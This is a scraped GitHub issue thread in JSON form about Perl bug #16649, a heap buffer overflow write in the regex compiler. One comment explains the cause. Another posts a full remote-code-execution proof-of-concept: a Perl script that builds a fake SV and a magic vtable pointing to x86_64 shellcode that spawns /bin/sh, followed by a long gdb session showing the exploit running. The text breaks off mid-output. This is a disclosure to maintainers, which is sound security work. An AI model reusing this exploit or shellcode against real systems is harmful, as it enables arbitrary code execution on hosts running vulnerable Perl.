'open'\u003c/p\u003e","bodyVersion":"a8486952cad8274318179591829766a71e55450ce1f389d2f35ba2f01b9f4b94","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097442","createdAt":"2018-08-15T18:01:24Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZT6_1SAAqTU0NDA5NzQ0Mg=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097443,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ0Mw==","body":"### From @khwilliamson\n\nResending this as it did not make it to the list\u0026#8203;:\n\nOn Wed\\, 15 Aug 2018 11\u0026#8203;:01\u0026#8203;:24 \\-0700\\, khw wrote\u0026#8203;:\n\u003e I suspect this is a serious security issue\\. One can position where\n\u003e beyond the end of buffer gets written by adding \\\\x80's to the ones\n\u003e already there\\. But I'd be happy to be wrong about this\\.\n\u003e \n\u003e The cause is one branch during the parsing leaves the parse pointer\n\u003e positioned one too far\\, and that causes the backslash to be skipped\n\u003e during pass2\\, which causes a '\\]' to be treated as a metacharacter\n\u003e instead of a literal\\.\n\u003e \n\u003e The fix is to remove the single line that incorrectly increments the\n\u003e parse pointer\\.\n\u003e I don't know that this being an experimental feature has any bearing\n\u003e on it\\.\n\u003e \n\u003e There is another thing\\. The minus sign in this case could have been\n\u003e caught as incorrect\\. But the same out\\-of\\-bounds writes would occur if\n\u003e a '^' replaced the minus\\, and that would be a correct use\\.\n\u003e \n\u003e Karl Williamson","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/khwilliamson/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/khwilliamson\"\u003e@khwilliamson\u003c/a\u003e\u003c/h3\u003e\n\u003cp dir=\"auto\"\u003eResending this as it did not make it to the list:\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOn Wed, 15 Aug 2018 11:01:24 -0700, khw wrote:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eI suspect this is a serious security issue. One can position where\u003cbr\u003e\nbeyond the end of buffer gets written by adding \\x80's to the ones\u003cbr\u003e\nalready there. But I'd be happy to be wrong about this.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe cause is one branch during the parsing leaves the parse pointer\u003cbr\u003e\npositioned one too far, and that causes the backslash to be skipped\u003cbr\u003e\nduring pass2, which causes a ']' to be treated as a metacharacter\u003cbr\u003e\ninstead of a literal.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe fix is to remove the single line that incorrectly increments the\u003cbr\u003e\nparse pointer.\u003cbr\u003e\nI don't know that this being an experimental feature has any bearing\u003cbr\u003e\non it.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThere is another thing. The minus sign in this case could have been\u003cbr\u003e\ncaught as incorrect. But the same out-of-bounds writes would occur if\u003cbr\u003e\na '^' replaced the minus, and that would be a correct use.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eKarl Williamson\u003c/p\u003e\n\u003c/blockquote\u003e","bodyVersion":"2c1e4205360a04dbd9305d34579360f777ec1acb3dd27b22a03480674c127400","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097443","createdAt":"2018-08-16T03:52:55Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZUDdYdgAqTU0NDA5NzQ0Mw=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097445,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ0NQ==","body":"### From @Etsukata\n\nThe following code generates a regexp which executes arbitrary command\nduring global destruction\\.\nIt overwrites some SV pointer address to a crafted fake SV on overwritten\nheap which has the malicious svt\\_free\\(shell\\_code\\) on its magic vtable\\.\n\nLimitations\u0026#8203;:\n\n\u0026nbsp; \\- must set \\`execstack \\-s\\` to perl\n\u0026nbsp; \\- require address leak\\(exact address of overwritten heap\\)\n\n\\`\\`\\`\n\\#\\!/usr/bin/perl\n\n\\#\n\\# RCE exploit PoC for\n\\# \\[perl \\#133423\\] regcomp\u0026#8203;: heap\\-buffer\\-overflow write\n\\# on perl\\-blead\\-48ae8dc\n\\#\n\nuse strict;\nuse warnings;\n\n\\# 0xabcd =\u003e '\\\\xcd\\\\xab\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00'\nsub h2s \\{\n\u0026nbsp; my $h = shift;\n\u0026nbsp; my $sz = shift;\n\u0026nbsp; my $ret = '';\n\u0026nbsp; for \\(0\\.\\.\\($sz \\- 1\\)\\) \\{\n\u0026nbsp; $ret \\.= sprintf\\(\"\\\\\\\\x%02x\"\\, \\(\\($h \u003e\u003e \\(8 \\* $\\_\\)\\) \u0026 0xff\\)\\);\n\u0026nbsp; \\}\n\u0026nbsp; return $ret\n\\}\n\n\\# must set \\`execstack \\-s\\` to perl\nmy $cmd = 'gdb \\-q \\-\\-args ~/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl\n\\-DorD \\-le ';\nmy $prefix = '\\\\'my $r = \"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\\\\\\\\\\\\\a\\]\\)\\)\\\\\\\\\\\\\\\\\\]a\\\\x00';\n\nmy $address = 0xa34c7d; \\# overwrite start address\n\u0026nbsp; \\# search with\u0026#8203;:\n\u0026nbsp; \\# \\(gdb\\) b regcomp\\.c\u0026#8203;:14044\n\u0026nbsp; \\# \\(gdb\\) p s\n\u0026nbsp; \\# \\[CAUTION\\] must not contain '\\]' \\(0x5d\\)\n\u0026nbsp; \\#\nmy $sv\\_any\\_address = $address \\+ 8 \\+ 4 \\+ 4 \\+ 8;\nmy $stash\\_address = $sv\\_any\\_address \\+ 8 \\+ 8;\nmy $stash\\_address2 = $stash\\_address \\+ 8 \\+ 4 \\+ 4;\nmy $magic\\_address = $stash\\_address \\+ 8 \\+ 4 \\+ 4 \\+ 8 \\+ 8 \\+ 8 \\+ 19 \\+ 8;\nmy $mg\\_virtual\\_address = $magic\\_address \\+ 8 \\+ 8 \\+ 2 \\+ 1 \\+ 1 \\+ 8 \\+ 8 \\+ 8;\nmy $shell\\_code\\_address = $mg\\_virtual\\_address \\+ 8 \\+ 8 \\+ 8 \\+ 8 \\+ 8;\n\nmy $body =\n\\# sv\\($address\\)\n\u0026nbsp; h2s\\($sv\\_any\\_address\\, 8\\)\n\\. h2s\\(0x01\\, 4\\) \\# sv\\_refcnt\n\\. h2s\\(0x100007\\, 4\\) \\# sv\\_flags \\(SVt\\_PVMG || SVs\\_OBJECT\\)\n\\. h2s\\(0x00\\, 8\\) \\# sv\\-\u003esv\\_u\\.svu\\_pv\n\\# any\\($sv\\_any\\_address\\)\n\\. h2s\\($stash\\_address\\, 8\\) \\# HV\\* xmg\\_stash\n\\. h2s\\($magic\\_address\\, 8\\) \\# union \\_xmgu xmg\\_u \\(MAGIC\\* xmg\\_magic\\)\n\n\\# xmg\\_stash\\($stash\\_address\\)\n\\. h2s\\($stash\\_address2\\, 8\\) \\# sv\\_any\n\\. h2s\\(0x01\\, 4\\) \\# sv\\_refcnt\n\\. h2s\\(0x0c\\, 4\\) \\# sv\\_flags \\(SVt\\_PVHV\\)\n\\# any\\($stash\\_address2\\)\n\\. h2s\\(0x00\\, 8\\) \\# HV\\* xmg\\_stash\n\\. h2s\\($magic\\_address\\, 8\\) \\# union \\_xmgu xmg\\_u \\(MAGIC\\* xmg\\_magic\\)\n\\. h2s\\(0x00\\, 8\\) \\# padding\n\n\\. '\" \\. \"a\" x 19 \\. \"' \\# padding\n\\. h2s\\($address\\, 8\\) \\# OVERWRITE gvp\n\n\\# xmg\\_magic\\($magic\\_address\\)\n\\. h2s\\(0x00\\, 8\\) \\# MAGIC\\* mg\\_moremagic;\n\\. h2s\\($mg\\_virtual\\_address\\, 8\\) \\# MGVTBL\\* mg\\_virtual /\\* pointer to magic\nfunctions \\*/\n\\. h2s\\(0x00\\, 2\\) \\# U16 mg\\_private;\n\\. h2s\\(0x00\\, 1\\) \\# char mg\\_type;\n\\. h2s\\(0x00\\, 1\\) \\# U8 mg\\_flags;\n\\. h2s\\(0x00\\, 8\\) \\# SSize\\_t mg\\_len;\n\\. h2s\\(0x00\\, 8\\) \\# SV\\* mg\\_obj;\n\\. h2s\\(0x00\\, 8\\) \\# char\\* mg\\_ptr;\n\n\\# mg\\_virual\\($mg\\_virtual\\_address\\)\n\\. h2s\\(0x00\\, 8\\) \\# int \\(\\*svt\\_get\\) \\(pTHX\\_ SV \\*sv\\, MAGIC\\*\nmg\\);\n\\. h2s\\(0x00\\, 8\\) \\# int \\(\\*svt\\_set\\) \\(pTHX\\_ SV \\*sv\\, MAGIC\\*\nmg\\);\n\\. h2s\\(0x00\\, 8\\) \\# U32 \\(\\*svt\\_len\\) \\(pTHX\\_ SV \\*sv\\, MAGIC\\*\nmg\\);\n\\. h2s\\(0x00\\, 8\\) \\# int \\(\\*svt\\_clear\\)\\(pTHX\\_ SV \\*sv\\, MAGIC\\* mg\\);\n\\. h2s\\($shell\\_code\\_address\\, 8\\) \\# int \\(\\*svt\\_free\\) \\(pTHX\\_ SV \\*sv\\, MAGIC\\*\nmg\\);\n\n\\# x86\\_64 shell\\_code\n\\.\n'\\\\x48\\\\x31\\\\xd2\\\\x52\\\\x48\\\\xb8\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x50\\\\x48\\\\x89\\\\xe7\\\\x52\\\\x57\\\\x48\\\\x89\\\\xe6\\\\x48\\\\x8d\\\\x42\\\\x3b\\\\x0f\\\\x05'\n\n\\. '\\]\\)a\\\\\\\\\\\\\\\\6\"; qr/$r/\\\\'';\n\nmy $payload = $prefix \\. $body;\n\nprint $cmd \\. $payload \\. \"\\\\n\";\n\\`\\`\\`\n\nSample output\n\n\\`\\`\\`\n\\[eiichi@\u0026#8203;x1 exploit\\]$ perl perl\\_regexp\\_mg\\_free\\.pl\ngdb \\-q \\-\\-args ~/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl \\-DorD \\-le\n'my $r =\n\"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\\\\\a\\]\\)\\)\\\\\\\\\\]a\\\\x00\\\\x95\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x07\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xa5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x0c\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\"\n\\. \"a\" x 19 \\.\n\"\\\\x7d\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x14\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x3c\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x48\\\\x31\\\\xd2\\\\x52\\\\x48\\\\xb8\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x50\\\\x48\\\\x89\\\\xe7\\\\x52\\\\x57\\\\x48\\\\x89\\\\xe6\\\\x48\\\\x8d\\\\x42\\\\x3b\\\\x0f\\\\x05\\]\\)a\\\\\\\\6\";\nqr/$r/'\n\\[eiichi@\u0026#8203;x1 exploit\\]$ gdb \\-q \\-\\-args\n~/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl \\-DorD \\-le 'my $r =\n\"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\\\\\a\\]\\)\\)\\\\\\\\\\]a\\\\x00\\\\x95\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x07\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xa5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x0c\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\"\n\\. \"a\" x 19 \\.\n\"\\\\x7d\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x14\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x3c\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x48\\\\x31\\\\xd2\\\\x52\\\\x48\\\\xb8\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x50\\\\x48\\\\x89\\\\xe7\\\\x52\\\\x57\\\\x48\\\\x89\\\\xe6\\\\x48\\\\x8d\\\\x42\\\\x3b\\\\x0f\\\\x05\\]\\)a\\\\\\\\6\";\nqr/$r/'\nReading symbols from\n/home/eiichi/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl\\.\\.\\.done\\.\n\\(gdb\\) b regcomp\\.c\u0026#8203;:14044\nBreakpoint 1 at 0x4cb38d\u0026#8203;: file regcomp\\.c\\, line 14044\\.\n\\(gdb\\) run\nStarting program\u0026#8203;:\n/home/eiichi/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl \\-DorD \\-le my\\\\\n\\\\$r\\\\ =\\\\\n\\\\\"\\\\\\(\\\\?\\\\\\[\\\\\\(\\\\?x\u0026#8203;:\\\\\\(\\\\?\\\\\\[\\\\\\\\\\\\\\\\a\\\\\\]\\\\\\)\\\\\\)\\\\\\\\\\\\\\\\\\\\\\]a\\\\\\\\x00\\\\\\\\x95\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x01\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x07\\\\\\\\x00\\\\\\\\x10\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\xa5\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\xe8\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\xb5\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x01\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x0c\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\xe8\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\"\\\\\n\\.\\\\ \\\\\"a\\\\\"\\\\ x\\\\ 19\\\\ \\.\\\\\n\\\\\"\\\\\\\\x7d\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x14\\\\\\\\x4d\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x3c\\\\\\\\x4d\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x48\\\\\\\\x31\\\\\\\\xd2\\\\\\\\x52\\\\\\\\x48\\\\\\\\xb8\\\\\\\\x2f\\\\\\\\x62\\\\\\\\x69\\\\\\\\x6e\\\\\\\\x2f\\\\\\\\x2f\\\\\\\\x73\\\\\\\\x68\\\\\\\\x50\\\\\\\\x48\\\\\\\\x89\\\\\\\\xe7\\\\\\\\x52\\\\\\\\x57\\\\\\\\x48\\\\\\\\x89\\\\\\\\xe6\\\\\\\\x48\\\\\\\\x8d\\\\\\\\x42\\\\\\\\x3b\\\\\\\\x0f\\\\\\\\x05\\\\\\]\\\\\\)a\\\\\\\\\\\\\\\\6\\\\\"\\\\;\\\\\nqr/\\\\$r/\n\\[Thread debugging using libthread\\_db enabled\\]\nUsing host libthread\\_db library \"/lib64/libthread\\_db\\.so\\.1\"\\.\nwarning\u0026#8203;: Loadable section \"\\.note\\.gnu\\.property\" outside of ELF segments\nwarning\u0026#8203;: Loadable section \"\\.note\\.gnu\\.property\" outside of ELF segments\nwarning\u0026#8203;: Loadable section \"\\.note\\.gnu\\.property\" outside of ELF segments\n\\(\\-e\u0026#8203;:0\\) sv\\_upgrade clearing PL\\_stashcache\n\\(\\-e\u0026#8203;:0\\) sv\\_upgrade clearing PL\\_stashcache\n\\(\\-e\u0026#8203;:0\\) sv\\_upgrade clearing PL\\_stashcache\n\\(\\-e\u0026#8203;:0\\) sv\\_upgrade clearing PL\\_stashcache\n\\(\\-e\u0026#8203;:0\\) sv\\_upgrade clearing PL\\_stashcache\n\\(\\-e\u0026#8203;:2\\) Looking for DESTROY method for IO\u0026#8203;::File\n\\(\\-e\u0026#8203;:2\\) Looking for method DESTROY in package IO\u0026#8203;::File\n\\(\\-e\u0026#8203;:2\\) Looking for method DESTROY in package UNIVERSAL\n\\(\\-e\u0026#8203;:2\\) Looking for method AUTOLOAD in package IO\u0026#8203;::File\n\\(\\-e\u0026#8203;:2\\) Looking for method AUTOLOAD in package UNIVERSAL\n\\(\\-e\u0026#8203;:2\\) Set cached DESTROY method 0 for IO\u0026#8203;::File\nEnabling $\\` $\u0026 $' support \\(0x7\\)\\.\n\nEXECUTING\\.\\.\\.\n\nCompiling REx\n\"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\a\\]\\)\\)\\\\\\]a%0%x\\{95\\}L%x\\{a3\\}%0%0%0%0%0%1%0%0%0%7%0%20%0\"\\.\\.\\.\nThe regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in\nm/\\(?\\[ \\\u003c\\-\\- HERE \\(?x\u0026#8203;:\\(?\\[\\\\a\\]\\)\\)\\\\\\]a?L??L???L?\n\n\n ?aaaaaaaaaaaaaaaaaaa\\}L?M?\\\u003cM?H1H?/bin//shPH?WH??B;\\]\\)a\\\\6/ at \\-e line 1\\.\nThe regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in\nm/\\(?\\[\\(?x\u0026#8203;:\\(?\\[ \\\u003c\\-\\- HERE \\\\a\\]\\)\\)\\\\\\]a?L??L???L?\n\n\n ?aaaaaaaaaaaaaaaaaaa\\}L?M?\\\u003cM?H1H?/bin//shPH?WH??B;\\]\\)a\\\\6/ at \\-e line 1\\.\n\nBreakpoint 1\\, S\\_regatom \\(pRExC\\_state=pRExC\\_state@\u0026#8203;entry=0x7fffffffcd40\\,\nflagp=flagp@\u0026#8203;entry=0x7fffffffca24\\,\n\u0026nbsp; depth=depth@\u0026#8203;entry=4\\) at regcomp\\.c\u0026#8203;:14044\n14044 \\*\\(s\\)\\+\\+ = \\(U8\\) ender;\nMissing separate debuginfos\\, use\u0026#8203;: dnf debuginfo\\-install\nkeyutils\\-libs\\-1\\.5\\.10\\-6\\.fc28\\.x86\\_64 krb5\\-libs\\-1\\.16\\.1\\-13\\.fc28\\.x86\\_64\nlibcom\\_err\\-1\\.44\\.2\\-0\\.fc28\\.x86\\_64\nlibnsl2\\-1\\.2\\.0\\-2\\.20180605git4a062cf\\.fc28\\.x86\\_64 libselinux\\-2\\.8\\-1\\.fc28\\.x86\\_64\nlibtirpc\\-1\\.0\\.3\\-3\\.rc2\\.fc28\\.x86\\_64 libxcrypt\\-4\\.1\\.1\\-4\\.fc28\\.x86\\_64\nopenssl\\-libs\\-1\\.1\\.0h\\-3\\.fc28\\.x86\\_64 pcre2\\-10\\.31\\-8\\.fc28\\.x86\\_64\nzlib\\-1\\.2\\.11\\-8\\.fc28\\.x86\\_64\n\\(gdb\\) p s\n$1 = 0xa34c7d \"\"\n\\(gdb\\) b S\\_mg\\_free\\_struct\nBreakpoint 2 at 0x4f0620\u0026#8203;: file mg\\.c\\, line 556\\.\n\\(gdb\\) dis br 1\n\\(gdb\\) c\nContinuing\\.\npanic\u0026#8203;: reg\\_node overrun trying to emit 0\\, a34d5c\u003e=a34c8c at \\-e line 1\\.\nCleaning named glob SV object\u0026#8203;:\n SV = PVMG\\(0xa34c95\\) at 0xa34c7d\n\u0026nbsp; REFCNT = 1\n\u0026nbsp; FLAGS = \\(OBJECT\\)\n\u0026nbsp; IV = 0\n\u0026nbsp; NV = 5\\.28751820946919e\\-317\n\u0026nbsp; PV = 0\n\u0026nbsp; MAGIC = 0xa34ce8\n\u0026nbsp; MG\\_VIRTUAL = 0xa34d14\n\u0026nbsp; MG\\_TYPE = PERL\\_MAGIC\\_sv\\(\\\\0\\)\n\u0026nbsp; STASH = 0xa34ca5\n\nBreakpoint 2\\, S\\_mg\\_free\\_struct \\(sv=sv@\u0026#8203;entry=0xa34ca5\\, mg=0xa34ce8\\) at\nmg\\.c\u0026#8203;:556\n556 const 